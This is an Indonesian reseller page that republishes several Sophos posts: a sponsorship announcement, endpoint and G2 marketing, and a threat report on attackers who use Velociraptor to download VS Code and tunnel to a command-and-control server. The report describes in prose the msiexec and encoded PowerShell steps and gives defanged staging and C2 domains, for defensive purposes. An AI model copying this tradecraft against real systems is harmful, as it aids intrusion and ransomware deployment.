a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4 SHA256 hash Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM Tabel 1: Indikator untuk ancaman GOLD SALEM Infrastruktur IT yang kuat…

Sophos Mendukung Objective-See Foundation untuk Meningkatkan Keamanan macOS dan Pendidikan Keamanan Siber yang Inklusif Didedikasikan untuk membangun komunitas keamanan Apple yang lebih kuat dan inklusif melalui alat keamanan sumber terbuka Sophos bangga menjadi “gold friend” dari Objective-See Foundation, mendukung misinya untuk memperluas akses pendidikan keamanan siber dan mendorong riset keamanan macOS inovatif yang digerakkan oleh komunitas. Seiring macOS menjadi target utama para pelaku kejahatan siber, organisasi seperti Objective-See sangat penting untuk membantu komunitas keamanan tetap selangkah lebih maju. Dalam tiga tahun terakhir, pangsa pasar perangkat macOS yang menjadi target kejahatan siber meningkat lebih dari 60%, dan harga alat seperti Atomic macOS Stealer (AMOS) meningkat tiga kali lipat pada tahun 2024 — sebuah tanda jelas bahwa perangkat Apple tidak lagi luput dari perhatian. Foundation ini berkomitmen menciptakan alat gratis dan sumber terbuka untuk macOS serta mempromosikan pendidikan dan inklusivitas dalam keamanan siber. Sophos merasa terhormat dapat mendukung misi ini, menegaskan komitmen kami terhadap inovasi berbasis pencegahan dan komunitas. Kontribusi kami berdampak langsung pada inisiatif inti organisasi: Objective by the Sea (#OBTS), satu-satunya konferensi keamanan khusus Apple di dunia yang mempertemukan para peneliti keamanan Apple terbaik. Persentase pembicara perempuan di #OBTS meningkat dari 10% pada tahun pertama menjadi lebih dari 30% pada edisi kedelapan — bukti nyata dampak Foundation. Objective for the We (#OFTW), acara inklusi dan komunitas dari Objective-See yang menyediakan pelatihan gratis, diskusi, sesi tanya jawab (AMA), dan jalur masuk ke keamanan Apple bagi para pelajar. Melalui #OFTW, lebih dari 310 pelajar telah menerima pelatihan, dengan lebih dari 400 aplikasi hingga saat ini. Beasiswa: memberikan kesempatan bagi pelajar—terutama perempuan dan kelompok yang kurang terwakili—untuk mengejar gelar keamanan siber dan menjadi generasi pembela berikutnya. Dalam empat edisi terakhir #OBTS, organisasi nirlaba ini telah memberikan beasiswa penuh (meliputi tiket pesawat, penginapan, pelatihan, dan tiket konferensi) kepada 29 pelajar—19 di antaranya perempuan—untuk menghadiri Objective for the We. Tiga penerima beasiswa tersebut kemudian menjadi pembicara di konferensi. “Dengan mendorong keberagaman, mendukung generasi muda, dan menginspirasi lebih banyak perempuan untuk memasuki dunia keamanan siber, Objective-See membentuk masa depan industri kami. Sophos bangga mendukung kerja penting ini, yang sejalan dengan komitmen kami terhadap inovasi inklusif dan pengembangan riset keamanan macOS,” kata Simon Reed, Chief Research Officer Sophos. Dengan mendukung Objective-See dalam misinya, Sophos menegaskan keyakinan bahwa kolaborasi terbuka dan investasi komunitas adalah kunci untuk tetap selangkah lebih maju dari ancaman yang terus berkembang — serta memastikan semua orang dapat berperan dalam membentuk masa depan keamanan siber. “Kami sangat berterima kasih atas dukungan besar dari Sophos, yang memungkinkan kami memperluas inisiatif ini, menjangkau lebih banyak orang di seluruh dunia, dan terus membangun komunitas keamanan Apple yang lebih kuat dan beragam,” ujar Patrick Wardle, pendiri Objective-See. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

Ketika orang bertanya kepada kami, “Bukankah semua solusi endpoint sekarang sama saja?” — jawaban kami sederhana: Tidak. Mereka tidak sama. Jika Anda sedang mengevaluasi perlindungan endpoint, kemungkinan Anda sudah menyadari sesuatu: Semua terdengar serupa. “Didukung AI.” “Generasi berikutnya.” “Terintegrasi.” Klaim-klaim ini ada di mana-mana. Dan dengan lebih dari 90% organisasi sekarang menggunakan beberapa bentuk perlindungan endpoint selain antivirus, mudah untuk berasumsi bahwa semua solusi itu sama. Tapi itu tidak benar. Asumsi ini cepat runtuh ketika organisasi berkembang — bergerak dari pencegahan dasar ke deteksi dan respons. Dalam evolusi ini, yang tadinya terlihat seperti aktivitas sekadar centang kotak menjadi keputusan arsitektur yang krusial. Apa yang Anda pilih sekarang memengaruhi tidak hanya seberapa baik Anda terlindungi, tetapi juga seberapa baik Anda dapat beradaptasi dan mengurangi risiko bisnis secara keseluruhan menghadapi ancaman yang terus berkembang. Jadi, bagaimana cara membedakan sinyal dari kebisingan? Kekuatan di Balik Platform Salah satu indikator terbaik dari apa yang dapat dilakukan solusi perlindungan untuk Anda — bukan hanya hari ini, tetapi jangka panjang — adalah platform tempat solusi tersebut dibangun. Tidak semua fitur mungkin penting bagi Anda di hari pertama, dan itu tidak apa-apa. Yang penting adalah apakah fondasi tersebut memberi Anda ruang untuk berkembang dan meningkatkan pertahanan siber Anda. Di sinilah pemikiran platform menjadi sangat penting: Apakah Anda memilih produk atau berinvestasi dalam strategi? Perlindungan endpoint modern bukan hanya soal apa yang terpasang di perangkat. Ini tentang data telemetri yang dikumpulkan, integrasi yang didukung, alur kerja yang diaktifkan, dan jalur data di balik semuanya. Terutama ketika AI semakin berperan dalam deteksi dan respons ancaman, kecanggihan infrastruktur data dasar tersebut menjadi pengganda kekuatan. Semua Dimulai dari Data Sebelum AI dapat membantu — apalagi mengotomatiskan — Anda membutuhkan data berkualitas tinggi, terstruktur dengan baik, dan terus diperbarui. Ini bukan pemikiran baru. Faktanya, ilmu data telah lama mengandalkan empat dimensi dasar: Volume, Variasi, Kecepatan, dan Kebenaran (Veracity). Mari kita terapkan itu pada perlindungan endpoint: Volume: Seberapa banyak telemetri yang dikumpulkan? Apakah Anda melihat perilaku nyata dari musuh secara global — bukan hanya malware, tetapi serangan yang dilakukan langsung, penyalahgunaan alat, dan metode penyamaran yang tersembunyi? Variasi: Apakah platform hanya melihat endpoint, atau juga mengambil data dari email, jaringan, cloud, identitas, dan lainnya? Apakah data berasal dari beragam pelanggan di berbagai wilayah, sektor, dan tingkat kematangan? Lebih banyak sumber berarti visibilitas lebih baik — dan konteks lebih kaya. Kecepatan: Seberapa cepat telemetri itu tiba, dan seberapa sering diperbarui? Apakah model Anda belajar dari ancaman baru dalam hitungan jam atau hari, atau Anda bergantung pada pembaruan tanda tangan mingguan? Kebenaran: Bisakah Anda mempercayai data itu? Apakah data diperkaya dengan intelijen ancaman dan diverifikasi melalui respons insiden nyata? Apakah deteksi didukung oleh penelitian, bukan hanya otomatisasi? Detail jawaban atas pertanyaan ini yang membedakan satu platform dengan yang lain. Dan ini menentukan apakah solusi dapat mendeteksi ancaman baru sebelum menjadi masalah industri luas, atau justru tertinggal. Mulai dengan Pencegahan. Berkembang ke Ketahanan. Endpoint sering kali menjadi peluang pertama — dan terbaik — untuk menghentikan serangan. Tapi jika arsitektur Anda memungkinkan, Anda dapat memperluas pencegahan itu ke email, jaringan, cloud, dan identitas. Dari situ, Anda bisa membangun kemampuan respons di seluruh permukaan serangan, memperkuat kemampuan Anda untuk mengendalikan ancaman dengan cepat dan menjaga sistem inti tetap berjalan saat ada yang lolos. Setiap langkah maju memperbesar keuntungan Anda. Anda mengurangi risiko bisnis, memperbaiki waktu deteksi, dan mempercepat respons. Dan jika Anda tidak memiliki sumber daya manusia untuk mengelola semuanya secara internal, Anda dapat mengandalkan mitra yang menawarkan layanan deteksi dan respons terkelola 24/7 (MDR) yang langsung terhubung ke platform Anda. Di Sophos, Ini Bukan Sekadar Teori Aktivitas Harian di Sophos Central Kami melindungi lebih dari 600.000 organisasi di seluruh dunia. Platform kami, Sophos Central, memproses lebih dari 223 Terabyte telemetri ancaman setiap hari, yang diambil dari setiap wilayah, sektor, dan permukaan serangan. Kami melihat ancaman lebih awal dan sering, menghasilkan lebih dari 34 juta deteksi setiap hari, memberikan keunggulan bagi para penangkal ancaman kami. Dan di balik data itu ada Sophos X-Ops, tim global analis ancaman, peneliti malware, dan spesialis respons yang memantau ratusan kelompok ancaman dan ribuan kampanye secara real time. Bersama-sama, intelijen dan keahlian yang dibangun di Sophos Central menghentikan rata-rata 11 juta serangan setiap hari, dengan 231 ancaman canggih diselesaikan oleh tim Managed Detection and Response kami. Secara kolektif, kami menjaga pelanggan tetap aman dan bisnis berjalan tanpa gangguan. Ketika orang bertanya kepada kami, “Bukankah semua solusi endpoint sekarang sama saja?” — jawaban kami sederhana: Tidak. Mereka tidak sama. Lihat lebih jauh dari kata-kata keren. Tanyakan apa yang dilihat platform, seberapa cepat ia belajar, dan siapa yang memvalidasi wawasan tersebut. Kebenarannya adalah, apa yang menggerakkan perlindungan sama pentingnya dengan perlindungan itu sendiri. Dan mereka yang memiliki data terbaik akan selalu selangkah lebih maju. Pada akhirnya, keamanan siber yang kuat bukan hanya kebutuhan teknis. Ini adalah keharusan bisnis yang melindungi operasi, reputasi, dan nilai jangka panjang. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

Sophos Puncaki Laporan G2 Fall 2025: Peringkat #1 Secara Keseluruhan dalam MDR dan Firewall Peringkat #1 dalam 47 Laporan Global G2 telah merilis Laporan Fall 2025, dan para pelanggan sekali lagi menempatkan Sophos di posisi teratas. Sophos meraih peringkat #1 secara keseluruhan dalam kategori Managed Detection and Response (MDR) dan #1 secara keseluruhan dalam perangkat lunak Firewall. Menunjukkan kekuatan platform kami, Sophos dinobatkan sebagai Pemimpin (Leader) untuk ke-13 kalinya secara berturut-turut di setiap G2 Overall Grid® yang mendefinisikan operasi keamanan modern: Endpoint Protection Platforms Endpoint Detection and Response (EDR) Extended Detection and Response (XDR) Firewall Software Managed Detection and Response (MDR) Pengakuan ini berasal dari ulasan rekan kerja yang telah diverifikasi dan mencerminkan apa yang paling dihargai oleh tim keamanan: Waktu pencapaian hasil yang lebih cepat Operasi yang lebih sederhana Keyakinan pada platform yang mampu berkembang dari pencegahan hingga respons yang dikelola Managed Detection and Response (MDR) Selain meraih peringkat #1 secara keseluruhan di antara solusi MDR, Sophos MDR juga dinilai sebagai solusi terbaik dalam lima segmen laporan, termasuk dalam Enterprise dan Mid-Market Grids. Sophos MDR juga meraih penghargaan Best Results dan Best Usability di kalangan pelanggan Enterprise. Endpoint Sophos EDR/XDR dinobatkan sebagai Pemimpin dalam delapan segmen berbeda pada Laporan Fall 2025, termasuk dalam Overall, Enterprise, Mid-Market, dan Small Business Grids. Platform Sophos XDR meraih penghargaan: Best Usability Best Results Best Relationship yang semakin mengukuhkan posisi unggulannya dalam hasil keamanan industri. Firewall Laporan G2 Fall 2025 menandai peringkat #1 keseluruhan ke-11 secara berturut-turut untuk Sophos Firewall. Dan untuk pertama kalinya, Sophos Firewall dinilai sebagai solusi firewall #1 oleh semua segmen pelanggan (Enterprise, Mid-Market, dan Small Business). Selain itu, Sophos Firewall meraih penghargaan: Overall Best Results Best Usability Best Relationship Apa Kata Pelanggan Sophos “Tingkat kenyamanan dan keamanan yang diberikan Sophos MDR kepada kami tidak bisa diukur.” — Lead Infrastructure Engineer, segmen Mid-Market “[Sophos MDR] adalah kombinasi otomatisasi yang kuat dan keahlian manusia nyata yang disampaikan melalui ekosistem keamanan yang terintegrasi secara erat.” — Pengguna di segmen Enterprise “Sophos Firewall menonjol karena menggabungkan perlindungan yang kuat dengan antarmuka yang mudah digunakan.” — Technical Support Engineer, segmen Small Business “[Sophos Firewall] menawarkan rangkaian fitur yang kuat, termasuk perlindungan ancaman lanjutan, pelaporan yang mudah dipahami, dan integrasi yang mulus dengan keamanan endpoint.” — Manager, segmen Mid-Market “Yang paling saya sukai dari Sophos Endpoint adalah kemampuannya memberikan perlindungan yang kuat namun tetap mudah dikelola dan hampir tidak terlihat oleh pengguna akhir.” — Technical Engineer, segmen Small Business “Dengan deteksi ancaman canggih yang didukung oleh deep learning dan analisis perilaku, [Sophos Endpoint] dengan cepat mengidentifikasi dan menetralkan bahkan ancaman paling canggih sekalipun.” — IT Manager, segmen Mid-Market Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!  

Pendekatan ini menunjukkan evolusi dari para pelaku ancaman yang menyalahgunakan alat pemantauan dan manajemen jarak jauh. Ditulis oleh Tim Riset Sophos Counter Threat Unit 26 Agustus 2025 Penelitian Ancaman | Alat Serangan | Akses Jarak Jauh | Velociraptor | Visual Studio Code Pada Agustus 2025, peneliti Counter Threat Unit™ (CTU) menyelidiki sebuah insiden intrusi yang melibatkan penggunaan alat digital forensik dan respons insiden (DFIR) Velociraptor yang bersifat open-source dan sah. Dalam insiden ini, pelaku ancaman menggunakan alat tersebut untuk mengunduh dan menjalankan Visual Studio Code dengan kemungkinan tujuan membuat terowongan ke server command and control (C2) yang dikendalikan penyerang. Mengaktifkan opsi terowongan di Visual Studio Code memicu peringatan dari Taegis™, karena opsi ini memungkinkan akses jarak jauh dan eksekusi kode jarak jauh, yang telah disalahgunakan oleh beberapa kelompok ancaman sebelumnya. Pelaku menggunakan utilitas Windows msiexec untuk mengunduh installer (v2.msi) dari domain Cloudflare Workers (files[.]qaubctgg[.]workers[.]dev). Lokasi ini tampaknya merupakan folder staging untuk alat-alat penyerang, termasuk alat tunneling Cloudflare dan alat administrasi jarak jauh Radmin. File ini menginstal Velociraptor yang dikonfigurasi untuk berkomunikasi dengan server C2 velo[.]qaubctgg[.]workers[.]dev. Pelaku kemudian menggunakan perintah PowerShell yang dienkode untuk mengunduh Visual Studio Code (code.exe) dari folder staging yang sama dan menjalankannya dengan opsi terowongan aktif. Pelaku menginstal code.exe sebagai layanan dan mengarahkan outputnya ke file log. Selanjutnya, mereka kembali menggunakan utilitas msiexec Windows untuk mengunduh malware tambahan (sc.msi) dari folder workers[.]dev (lihat Gambar 1). Velociraptor membuat terowongan Visual Studio Code Gambar 1: Pohon proses yang menunjukkan Velociraptor membuat terowongan Visual Studio Code. Aktivitas tunneling Visual Studio Code memicu peringatan Taegis yang menyebabkan investigasi oleh Sophos. Analis memberikan saran mitigasi yang memungkinkan pelanggan segera mengambil tindakan perbaikan seperti mengisolasi host yang terinfeksi, yang mencegah pelaku mencapai tujuannya. Analisis menunjukkan bahwa aktivitas jahat ini kemungkinan besar akan berujung pada penyebaran ransomware. Pelaku ancaman sering menyalahgunakan alat pemantauan dan manajemen jarak jauh (RMM). Kadang-kadang mereka memanfaatkan alat yang sudah ada di sistem target, dan di lain waktu mereka menginstal alat tersebut selama serangan. Insiden Velociraptor ini mengungkap bahwa penyerang mulai menggunakan alat respons insiden untuk mendapatkan pijakan dalam jaringan sekaligus meminimalkan jumlah malware yang mereka sebarkan. Organisasi disarankan untuk memantau dan menyelidiki penggunaan Velociraptor yang tidak sah, dan menganggap temuan penggunaan alat ini sebagai tanda awal potensi serangan ransomware. Mengimplementasikan sistem deteksi dan respons endpoint, memantau alat tak terduga dan perilaku mencurigakan, serta mengikuti praktik terbaik untuk mengamankan sistem dan melakukan pencadangan, dapat membantu mengurangi risiko serangan ransomware. Dampak serangan dapat sangat diminimalkan jika terdeteksi sebelum ransomware dijalankan. Proteksi Sophos berikut mendeteksi aktivitas terkait ancaman ini: Troj/Agent-BLMR Troj/BatDl-PL Troj/Mdrop-KDK Untuk mengurangi risiko dari malware ini, peneliti CTU™ menyarankan organisasi menggunakan kontrol yang tersedia untuk meninjau dan membatasi akses menggunakan indikator yang tercantum di Tabel 1. Domain-domain tersebut dapat berisi konten berbahaya, sehingga pertimbangkan risikonya sebelum membukanya di browser. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!